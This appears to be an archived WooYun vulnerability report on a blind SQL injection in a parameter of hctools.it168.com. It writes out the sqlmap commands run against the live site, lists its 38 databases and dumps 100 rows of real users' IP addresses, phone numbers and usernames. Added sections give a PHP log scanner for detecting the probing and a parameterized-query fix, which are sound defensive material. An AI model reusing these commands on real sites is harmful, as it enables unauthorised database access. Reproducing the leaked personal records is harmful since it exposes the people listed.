WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops article archive: http://drop.zone.ci/
Disclosure timeline:
2014-10-07: Details reported to the vendor, awaiting vendor handling
2014-10-09: Vendor confirmed the issue; details visible to the vendor only
2014-10-19: Details opened to core white hats and domain experts
2014-10-29: Details opened to regular white hats
2014-11-08: Details opened to intern white hats
2014-11-21: Details made public
Description: User input is not properly sanitized for dangerous characters before it reaches the SQL query.
Injectable parameter: brandid

python sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 --banner
web application technology: PHP 5.5.5, Nginx
back-end DBMS: MySQL >= 5.0.0
banner: '5.1.50-log'
python sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 --dbs

available databases [38]:
[*] ad
[*] aix
[*] bsd
[*] che
[*] comment
[*] count
[*] cu_download
[*] cu_job
[*] cu_jobs
[*] cublog
[*] cucms
[*] db_book
[*] db_edu
[*] db_print
[*] db_product
[*] db_salon
[*] db_techlink
[*] db_youxidian
[*] diaocha
[*] doc
[*] ebookmail
[*] gongho
[*] help
[*] hi
[*] information_schema
[*] ittimes
[*] ittimes2
[*] linuxpublish
[*] mysql
[*] newspub
[*] test
[*] tushu
[*] uc_gbk
[*] vote
[*] vote2
[*] wiki
[*] wiki_utf8
[*] wotuiwole
python sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 -D diaocha -T it168_2009 -C id,ip,phone,username --start=1 --stop=100 --dump

(first 100 rows retrieved as proof)

Database: diaocha
Table: it168_2009
[100 entries]
+-----+-----------------+----------------------------+----------------------------------------------------------+
| id  | ip              | phone                      | username                                                 |
+-----+-----------------+----------------------------+----------------------------------------------------------+
| 64  | 202.108.130.138 | 13810759208                | dearcelina |
| 63  | 222.175.109.50  | 13910182143                | badboyokokok |
| 62  | 210.51.173.169  | 58022266\\u00a3\\u00ad589  | fire9 |
| 7   | 123.103.43.232  | 13466592878                | dzb_01 |
| 8   | 124.64.72.238   | 13811703481                | kid.xiyang |
| 9   | 123.124.198.195 | 64242299                   | duxuetao |
| 10  | 125.33.130.146  | 13910301945                | eveson |
| 11  | 125.33.130.146  | 13811810491                | shilihua |
| 12  | 203.187.191.167 | 13466379758                | agen_0502 |
| 13  | 202.99.23.184   | 010-65368391/15810566366   | TerryGong |
| 14  | 202.99.23.184   | 010-65368389/13910325421   | mrrun |
| 15  | 221.221.218.251 | 13260003537                | guangzidao |
| 16  | 125.34.208.136  | 13911463824                | \\u00bd\\u00a3\\u00b4\\u00ce\\u00c0\\u00c7 |
| 17  | 211.99.216.18   | 150001383472               | yudi2006 |
| 18  | 211.155.253.89  | 15011051647                | zhangjunyi |
| 19  | 211.103.237.35  | 15011424628                | cst05001 |
| 20  | 123.112.82.106  | 13910116314                | polokus |
| 21  | 218.240.131.114 | 15811055822                | Seker |
| 22  | 211.99.216.18   | 84562121-1055              | lktpd |
| 23  | 222.134.206.253 | 13506346064                | zhaoxian |
| 24  | 222.134.206.253 | 010-62083613               | fadianjizu |
| 25  | 202.108.145.77  | 13621108444                | ziggler |
| 26  | 124.192.11.35   | 010-65339328               | jerrywjl |
| 27  | 219.237.194.111 | 13810436018                | opbsder |
| 28  | 202.106.68.98   | 13466641423                | Ksharp |
| 29  | 124.42.101.210  | 13269651468                | senir |
| 30  | 61.172.241.98   | 13816778816                | crazymeny |
| 31  | 211.99.216.18   | 13910402240                | sleepycat |
| 32  | 124.42.101.210  | 13488867086                | firefly.jiang |
| 33  | 125.69.110.149  | 13540418960                | yellowking |
| 34  | 123.112.113.91  | 13381221392                | freet15 |
| 35  | 219.143.44.130  | 15010248504                | gyl4802959 |
| 36  | 222.128.23.6    | 15810729060                | a1my |
| 37  | 219.143.47.18   | 13401001191                | arcow |
| 38  | 221.218.164.211 | 13911152920                | \\u00c5\\u00d6\\u00f3\\u00ac\\u00f3\\u00b0 |
| 39  | 211.88.30.160   | 15811195112                | \\u00b9\\u00ab\\u00d7\\u00d3Q |
| 40  | 123.122.101.150 | 15810815043                | shenmue71 |
| 41  | 202.108.39.249  | 13570214027                | \\u00ce\\u00de\\u00c9\\u00f9\\u00ce\\u00de\\u00cf\\u00a2 |
| 42  | 222.128.23.6    | 13810832224                | tingfengmanbu |
| 43  | 202.108.39.249  | 02085106238                | hotsnow |
| 44  | 202.91.179.43   | 13439954909                | davidhan2009 |
| 45  | 124.193.83.30   | 13521512328                | hyran |
| 46  | 61.135.165.11   | 01063001300                | \\u00ca\\u00af\\u00d5\\u00b9 |
| 47  | 124.205.77.176  | 13661240387                | cindylzh |
| 48  | 61.135.165.12   | 15010133354                | hdksky |
| 49  | 211.99.20.6     | 13811431506                | spihiker |
| 50  | 202.106.94.136  | 13720056292                | xiegang112 |
| 51  | 210.77.2.98     | 13141322077                | tyc611 |
| 52  | 123.112.228.164 | 010-63480456               | chuhongze |
| 53  | 125.34.142.230  | 13911310157                | changchun_li |
| 54  | 123.127.220.10  | 13426219387                | aero |
| 55  | 124.205.77.23   | 13426342308                | fashionstyle |
| 56  | 122.200.74.162  | 13520239976                | chaucerliu |
| 57  | 202.108.145.11  | 13810929417                | songyupo |
| 58  | 211.155.253.89  | 13910018687                | hlglty |
| 59  | 211.155.253.89  | 13811050141                | bithuan |
| 60  | 218.249.43.227  | 15901232259                | craneflyfly |
| 61  | 218.19.0.29     | 13005150787                | mamalove |
| 65  | 124.193.150.98  | 88027749-8091              | ly_cyz |
| 66  | 211.103.249.4   | 13718227935                | 271329410 |
| 67  | 211.103.249.4   | 13141370583                | qingyangs |
| 68  | 218.249.49.194  | 01063182771                | wwj11998 |
| 69  | 221.222.145.82  | 13488675472                | human.gold |
| 70  | 59.151.54.34    | 58325249                   | redhat.zhou |
| 71  | 211.157.5.116   | 58325260                   | maxcl |
| 72  | 59.108.42.241   | 010-84105839               | zouyi2005 |
| 73  | 61.135.159.228  | 13810689432                | h_xin8211 |
| 74  | 219.237.242.160 | 13269997344                | xiaoqi8866 |
| 75  | 218.240.136.221 | 15811015463                | tljwcm |
| 76  | 218.240.136.221 | 58834046                   | alexsun72 |
| 77  | 123.118.119.10  | 15910647819                | niangao1005 |
| 78  | 202.8.27.5      | 13910627963                | wshun |
| 79  | 218.247.142.203 | 62135687-866               | cah |
| 80  | 203.86.84.36    | 13520902241                | \\u00c7\\u00e5\\u00b3\\u00bf\\u00b9\\u00e2 |
| 81  | 211.151.88.39   | 15801465152                | llfxt |
| 82  | 221.221.22.162  | 13264294906                | superlifebuoy |
| 83  | 60.28.240.69    | 13581731367                | dlx1986 |
| 84  | 219.239.107.2   | 88196725                   | gust |
| 85  | 58.207.156.10   | 13810625240                | litaopier |
| 86  | 221.221.22.162  | 13810969780                | \\u00b4\\u00ba\\u00c8\\u00a5\\u00c7\\u00ef\\u00c0\\u00b4 |
| 87  | 219.224.99.205  | 13811450340                | yanaiming |
| 88  | 210.76.108.158  | 13426332010                | qiaobinbin |
| 89  | 124.205.77.104  | 15910685356                | billzhou |
| 90  | 58.83.131.8     | 13393362792                | forward51 |
| 91  | 60.30.68.151    | 022-63981890               | race |
| 92  | 58.83.131.8     | 13393362792                | forward52 |
| 93  | 58.31.141.23    | 15810293009                | pc0326 |
| 94  | 58.83.131.4     | 13811934236                | dongchun123 |
| 95  | 124.200.56.57   | 13601216657                | qinershi |
| 96  | 211.69.198.196  | 15171459982                | dawdo |
| 97  | 60.10.82.82     | 13910909137                | zhylyq |
| 98  | 124.64.106.88   | 13811920823                | yj11 |
| 99  | 123.112.77.47   | (8610)88432858-8252        | liurunfeng |
| 100 | 124.42.72.18    | 13911319742                | \\u00be\\u00b8\\u00bf\\u00b5 |
| 101 | 119.143.128.112 | 13372520776                | single_element |
| 102 | 125.96.85.194   | 62792944-222               | youngcow |
| 103 | 124.126.86.40   | 13911506054                | cnhtml |
| 104 | 202.108.130.138 | 13651083526                | winice |
| 105 | 119.254.240.146 | 13910114233                | RAULNAN |
| 106 | 218.240.2.98    | 13811088383                | xjc2694 |
+-----+-----------------+----------------------------+----------------------------------------------------------+
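The time-based blind injection above produces no error page, so the only server-side trace of the probing is the request log. The following is an added example, not code from the original report or from hctools.it168.com: a small PHP script that scans nginx access-log lines for requests to submit.php whose brandid value is not a plain integer, and for the default sqlmap User-Agent string. The log lines are constructed for illustration (203.0.113.5 is a documentation address), and the exact User-Agent text is an assumption.

```php
<?php
declare(strict_types=1);

// Added example, not part of the original report: flag requests to submit.php
// whose brandid value is not a plain integer, plus requests carrying a sqlmap
// User-Agent. Log lines below are constructed; the client IP is a placeholder.

/** Return a reason string if the line looks like probing of brandid, else null. */
function isSuspiciousRequest(string $line): ?string
{
    // Pull the request target out of the quoted "METHOD /path HTTP/x.y" field.
    if (!preg_match('#"(?:GET|POST) (\S+) HTTP/[\d.]+"#', $line, $m)) {
        return null;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return null;            // no query string at all
    }
    parse_str($query, $params); // URL-decodes %27, %20 and friends
    if (!array_key_exists('brandid', $params)) {
        return null;
    }
    $brandid = $params['brandid'];
    // A legitimate id is a short positive integer; anything else (quotes,
    // spaces, SQL keywords, array syntax) is a probe worth alerting on.
    if (!is_string($brandid) || !preg_match('/^\d{1,10}$/', $brandid)) {
        return 'non-integer brandid: ' . (is_string($brandid) ? $brandid : '[array]');
    }
    // Automated tooling often announces itself in the User-Agent.
    if (stripos($line, 'sqlmap') !== false) {
        return 'scanner user-agent';
    }
    return null;
}

/** Scan all lines and return [lineNumber => reason] for the suspicious ones. */
function scanAccessLog(array $lines): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        $reason = isSuspiciousRequest($line);
        if ($reason !== null) {
            $hits[$i + 1] = $reason;
        }
    }
    return $hits;
}

// Constructed sample lines in nginx "combined" format.
$sampleLog = [
    '203.0.113.5 - - [07/Oct/2014:10:00:01 +0800] "GET /submit.php?action=get_brand_print&brandid=12 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [07/Oct/2014:10:00:02 +0800] "GET /submit.php?action=get_brand_print&brandid=12%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [07/Oct/2014:10:00:03 +0800] "GET /submit.php?action=get_brand_print&brandid=12%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [07/Oct/2014:10:00:04 +0800] "GET /submit.php?action=get_brand_print&brandid=12 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev"',
    '203.0.113.5 - - [07/Oct/2014:10:00:05 +0800] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

foreach (scanAccessLog($sampleLog) as $lineNo => $reason) {
    echo "line $lineNo: $reason\n";
}
```

The integer check is the useful signal here: because the application expects a numeric id, any brandid containing a quote, a space or a comparison operator is never legitimate traffic, so this rule has a very low false-positive rate even though it knows nothing about specific payloads. Run it against the real access log with `php scan.php < access.log` after replacing the constructed array with lines read from STDIN.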
Fix suggestion: use parameterized SQL statements.
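To make the suggested fix concrete, here is an added example (not the site's own code and not from the original report) showing the string-interpolated pattern the report describes beside its parameterized replacement. It runs against an in-memory SQLite table so it executes stand-alone; the table and column names (brand, id, name) are assumptions, and the same PDO calls apply unchanged to the MySQL backend seen in the sqlmap banner.

```php
<?php
declare(strict_types=1);

// Added example, not code from hctools.it168.com. Table/column names are
// assumptions; SQLite in memory stands in for the site's MySQL database.

/** Build a throwaway table with two rows so both variants can be exercised. */
function setupDemoDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE brand (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
    $db->exec("INSERT INTO brand (id, name) VALUES (1, 'Alpha'), (2, 'Beta')");
    return $db;
}

// BEFORE: the raw request value becomes part of the SQL text, so whatever the
// client sends in brandid is parsed as SQL. This is the defect the report describes.
function getBrandVulnerable(PDO $db, string $brandid): array
{
    $sql = "SELECT id, name FROM brand WHERE id = $brandid";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// AFTER: reject anything that is not a short positive integer, then bind the
// value as a typed parameter. The driver sends it as data, never as SQL.
function getBrandSafe(PDO $db, string $brandid): array
{
    if (!preg_match('/^\d{1,10}$/', $brandid)) {
        return [];  // invalid id: answer with "no such brand" instead of querying
    }
    $stmt = $db->prepare('SELECT id, name FROM brand WHERE id = :id');
    $stmt->bindValue(':id', (int) $brandid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Read the parameter the way submit.php would, tolerating missing or array input.
function brandIdFromRequest(array $get): string
{
    $raw = $get['brandid'] ?? '';
    return is_string($raw) ? $raw : '';
}

$db = setupDemoDb();
// A normal id and a textbook tautology, to show that only the interpolated
// version lets the input change the meaning of the query.
foreach (['1', '1 OR 1=1'] as $input) {
    printf("input %-10s vulnerable=%d rows  safe=%d rows\n",
        var_export($input, true),
        count(getBrandVulnerable($db, $input)),
        count(getBrandSafe($db, $input)));
}
```

When wiring this into the real application, create the connection with `PDO::ATTR_EMULATE_PREPARES => false` so the MySQL driver uses genuine server-side prepared statements, and keep the integer check in front of the query: with a time-based blind injection there is no error to notice, so input validation is the layer that turns a silent probe into an immediate rejection.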
Severity: Low
Vulnerability rank: 1
Confirmed at: 2014-10-09 10:28
Vendor response: This is a discontinued service; because of an internal communication problem the domain was still pointing at it. Thanks for the help.
Vendor comment: None yet.